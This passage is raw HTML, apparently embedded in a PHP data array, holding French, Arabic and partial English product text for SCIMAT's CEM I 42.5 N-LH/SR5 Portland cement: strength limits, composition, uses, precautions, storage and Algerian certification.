<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></p>
</td>
<td style="height:104px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></p>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:29px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></p>
</td>
<td style="height:29px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:29px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">21,36</span> </strong></span></span></p>
</td>
<td style="height:29px; width:139px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">27,71</span></strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:48px; width:117px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; width:123px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span> </strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:48px; text-align:center; width:139px">
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>54,53</strong></span></span></p>
<p> </p>
</td>
</tr>
</tbody>
</table>
<div style="page-break-after: always"><span style="display:none"> </span></div>
<p> </p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Les propriétés chimiques, qui sont un facteur important de la résistance des bétons à des ambiances agressives, concernent la teneur en anhydride sulfurique (SO3) inférieure à 3.0 % (3,5 % pour les classes 42,5 R et 52,5) et en ions chlorure inférieure à 0,10 %.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Contrôle de la Qualité</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000"><u>Principaux domaines d’emploi</u> </span><span style="color:green">:</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5 </strong>convient pour le béton<a href="https://www.infociments.fr/glossaire/beton-arme" title="Béton armé"> </a>armé ou le béton précontraint, en revanche leurs caractéristiques mécaniques n’en justifient généralement pas l’emploi pour les travaux de maçonnerie courante et les bétons en grande masse ou faiblement armés.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Ciment CEM I / 42.5 N-LH/SR5</strong> permet un décoffrage rapide appréciable notamment en préfabrication. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les travaux en milieu agressif, eaux de mer ou eaux sulfatées, on emploiera respectivement le Ciment Portland <strong>CEM I 42.5 N-LH/SR5 </strong>pour travaux à la mer PM, ou pour travaux en eaux à haute teneur en sulfates ES.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#008000">Précautions particulières</span></u><span style="color:green"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour les ouvrages massifs, on évitera l’utilisation du <strong>Ciment CEM I 42.5 N-LH/SR5 </strong>dont la chaleur d’hydratation risque de conduire à une élévation de température excessive lors de leur réalisation.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><span style="color:#008000"><strong>Mesures de Protection</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></p>
</li>
</ul>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5</strong><span style="color:#000000"> est livré en vrac et en sacs de 50 kg.</span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le </span><strong>Ciment CEM I 42.5 N-LH/SR5 </strong><span style="color:#000000"> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>التركيبة :</strong></u></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> هو اسمنت بورتلاند ناتج عن طحن الكلنكر وكبريتات الكالسيوم (الجبس أو الأنهيدريت) لتنظيم الإعداد ، وربما المكونات الثانوية بكميات صغيرة بنسبة 5٪. محتوى الكلنكر 95٪ على الأقل.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u></span></span></span> <span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالإضافة إلى القيم المميزة لفئات القوة ، توفر المواصفة القياسية الامتثال لقيم حد مقاومة الانضغاط المطبقة على كل نتيجة اختبار. يتم قياس هذه المقاومة على "ملاط عادي" وفقًا للمعيار <strong>NA 442-2013</strong> المستوحى من المعيار الأوروبي <strong>NF EN</strong> <strong>196-1</strong>.</span></span></p>
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong>قيمة حد مقاومة الضغط لـ</strong> </span></span></span><span style="color:#008000"><strong><span style="font-family:georgia,serif; font-size:12.0pt">CEM I / 42.5 N-LH/SR5</span></strong></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" dir="rtl">
<thead>
<tr>
<th scope="col" style="height:104px; width:117px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة</strong></span></span></small></p>
</th>
<th scope="col" style="height:104px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">حد القوة وفقًا للمعيار<br />
NA 442</span></span></small></strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
<p style="text-align:center"> </p>
</th>
<th scope="col" style="height:104px; width:123px">
<p dir="rtl" style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحد الأدنى المحدد </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>لاسمنت SCIMAT</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong> </strong></span></span></p>
</th>
<th scope="col" style="height:104px; width:139px">
<p style="text-align:center"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى<br />
المحدد لاسمنت SCIMAT</strong></span></span></small></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><strong>يومان</strong></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> 10 </span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">≤</span></span></span></strong></p>
</td>
<td dir="ltr" style="height:30px; text-align:center; width:123px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">21,36</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:139px"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:black">27,71</span></strong></span></span></td>
</tr>
<tr>
<td style="height:30px; text-align:center; width:117px">
<p><span style="font-size:16px"><strong>28 يوم</strong></span></p>
</td>
<td style="height:30px; text-align:center; width:145px">
<p><strong><span style="font-family:times new roman,times,serif"><span style="font-size:14px"><span style="color:black">42,5 ≤ <span dir="ltr" lang="fr">res</span>≥62,5</span></span></span></strong></p>
</td>
<td style="height:30px; text-align:center; width:123px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:black">44,82 </span></span></span></strong></td>
<td style="height:30px; text-align:center; width:139px"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></td>
</tr>
</tbody>
</table>
<div style="clear:both;">
<div style="clear:both;"> </div>
<div style="clear:both;">
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخصائص الكيميائية ، التي تعتبر عاملاً مهماً في مقاومة الخرسانة للبيئات العدوانية ، تتعلق بمحتوى أنهيدريد الكبريت (SO3) الذي يقل عن 3.0٪ (3.5٪ للفئتين 42.5 R و 52.5) وفي أيونات الكلوريد الأقل من 0.10 ٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong><u>مجالات الاستعمال</u></strong></span><span style="color:#008000"><strong><u> الرئيسية</u> :</strong></span></span></span></small></p>
<p dir="rtl" style="text-align:justify"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH / SR5</strong> مناسب للخرسانة المسلحة أو الخرسانة </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">سابقة الإجهاد ، من ناحية أخرى فإن خصائصها الميكانيكية لا تبرر بشكل عام استخدامها لأعمال البناء العادية والخرسانة في كتلة كبيرة أو مقواة بشكل ضعيف.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يسمح </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> بتقشير سريع ملموس ، خاصة في التصنيع المسبق. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">للعمل في بيئة عدوانية أو مياه البحر أو المياه الكبريتية ، سيتم استخدام أسمنت بورتلاند <strong>CEM I 42.5 N-LH / SR5</strong> على التوالي للعمل في البحر مساءً ، أو للعمل في الماء الذي يحتوي على نسبة عالية من الكبريتات.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إحتياطات خاصة</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> : </span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">بالنسبة للهياكل الضخمة ، تجنب استخدام <strong> </strong></span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong> ، حيث قد تؤدي حرارة الماء إلى ارتفاع مفرط في درجة الحرارة أثناء بنائها.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية</span></span></strong></u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></strong></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال :</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين</u> : </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الاسمنت</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong>CEM I / 42.5 N-LH/SR5</strong></span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">تم اعتماد <strong>الاسمنت</strong> <strong>CEM I / 42.5 N-LH/SR5</strong> وفقًا للمعيار الجزائري <strong>2013/442</strong> مع علامة المطابقة الوطنية <strong>TEDJ</strong> الصادرة عن المعهد الجزائري للتقييس</span></span></p>
</div>
</div>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>The Cement CEM I / 42.5 N-LH / SR5 -NA 442 / 2013</strong>- is a Portland Cement resulting from the grinding of clinker and calcium sulphate (gypsum or anhydrite) to regulate the setting, and possibly secondary constituents in small quantities at 5 %. The clinker content is at least 95%.</span></span></p>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><strong>Compressive strength limit value for CEM I 42.5N SR 5</strong></span></span></span></p>
<div style="clear:both;">
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:370px; width:425px">
<tbody>
<tr>
<td style="height:104px; width:117px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:145px">
<pre style="text-align:center">
<span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Limit of Resistance according to the Standard NA 442
</strong></span></span></pre>
</td>
<td style="height:104px; width:123px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Specified Lower Limit<br />
of our Cement</span></span></strong></p>
<p style="text-align:center"> </p>
</td>
<td style="height:104px; width:139px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:30px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>02 days</strong></span></span></p>
</td>
<td style="height:30px; width:145px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
<td style="height:30px; width:123px">
<p style="text-align:center"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>21,36</strong></span></span></small></p>
</td>
<td style="height:30px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">27,71</span></span></strong></p>
</td>
</tr>
<tr>
<td style="height:51px; width:117px">
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>28 days</strong></span></span></p>
</td>
<td style="height:51px; width:145px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">62.5≤res≥42,5</span></strong></span></span></p>
</td>
<td style="height:51px; width:123px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:black">44,82</span></strong></span></span></p>
</td>
<td style="height:51px; width:139px">
<p style="text-align:center"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">54,53</span></span></strong></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The chemical properties, which are an important factor in the resistance of concrete to aggressive environments, concern the sulfuric anhydride (SO3) content of less than 3.0% (3.5% for classes 42.5 R and 52.5) and in chloride ions less than 0.10%.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><small><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Main fields of employment</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement CEM I / 42.5 N-LH / SR5</strong> is suitable for reinforced concrete or prestressed concrete, on the other hand its mechanical characteristics do not generally justify its use for ordinary masonry work and large mass or weakly reinforced concrete.<br />
<strong>The Cement CEM I / 42.5 N-LH / SR5</strong> allows appreciable rapid stripping, especially in prefabrication.<br />
For work in an aggressive environment, sea water or sulphated water, Portland Cement CEM I 42.5 N-LH / SR5 will be used respectively for work at sea PM, or for work in water with a high content of ES sulphates.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Special precautions</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">For massive structures, avoid the use of the<strong> Cement CEM I 42.5 N-LH / SR5</strong>, the heat of hydration of which may lead to an excessive rise in temperature during their construction.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
